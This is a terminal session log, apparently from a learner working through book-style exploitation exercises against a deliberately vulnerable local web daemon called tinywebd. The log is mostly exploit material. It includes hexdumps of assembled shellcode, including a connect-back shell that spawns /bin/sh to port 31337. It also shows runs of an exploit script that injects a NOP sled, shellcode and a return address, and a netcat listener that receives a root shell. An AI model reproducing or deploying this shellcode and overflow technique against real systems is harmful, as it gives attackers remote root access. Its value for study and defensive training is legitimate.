root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm mark_restore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C mark_restore
00000000  eb 26 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.&[1..K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 8d 6c  |.f.......j.X...l|
00000020  24 68 68 73 8f 04 08 c3  e8 d5 ff ff ff 2f 48 61  |$hhs........./Ha|
00000030  63 6b 65 64 58                                    |ckedX|
00000035
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# rm /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh mark_restore 127.0.01
target IP: 127.0.01
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (332 b)] [shellcode (53 b)] [ret addr (128 b)]
Connection to 127.0.01 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 13 21:42 /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2403  0.0  0.0   2180   368 ?        Ss   21:42   0:00 ./tinywebd
root      2424  0.0  0.0   5924   840 pts/0    S+   21:43   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# rm /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
ls: Zugriff auf /Hacked nicht möglich: Datei oder Verzeichnis nicht gefunden


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh mark_restore 127.0.01
target IP: 127.0.01
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (332 b)] [shellcode (53 b)] [ret addr (128 b)]
Connection to 127.0.01 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 13 21:48 /Hacked

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gedit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm loopback_shell_restore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C loopback_shell_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 73 8f  |j.X....t..l$hhs.|
00000010  04 08 c3 6a 66 58 99 31  db 43 52 6a 01 6a 02 89  |...jfX.1.CRj.j..|
00000020  e1 cd 80 96 6a 66 58 43  68 7f bb bb 01 66 89 54  |....jfXCh....f.T|
00000030  24 01 66 68 7a 69 66 53  89 e1 6a 10 51 56 89 e1  |$.fhzifS..j.QV..|
00000040  43 cd 80 87 f3 87 ce 49  b0 3f cd 80 49 79 f9 b0  |C......I.?..Iy..|
00000050  0b 52 68 2f 2f 73 68 68  2f 62 69 6e 89 e3 52 89  |.Rh//shh/bin..R.|
00000060  e2 53 89 e1 cd 80                                 |.S....|
00000066
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2478
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh loopback_shell_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell_restore (102 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (283 b)] [shellcode (102 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root
^C
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id 127.0.01
The web server for 127.0.01 is Tiny webserver
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
-su: fg: gegenwärtig: Kein solcher Job.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2499
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
^C
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
-su: fg: gegenwärtig: Kein solcher Job.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id 127.0.01
The web server for 127.0.01 is Tiny webserver
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o addr_struct addr_struct.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./addr_struct 12.34.56.78 9090
## 
   "8N  Proot@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./addr_struct 12.34.56.78 9090 | hexdump -C
00000000  02 00 23 82 0c 22 38 4e  ab 85 04 08 00 50 fc b7  |..#.."8N.....P..|
00000010
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# grep 0x xt_stealth.sh
RETADDR="\x24\xf5\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -batch -ex "p /x 0xbffff5c0 +15"
$1 = 0xbffff5cf

   
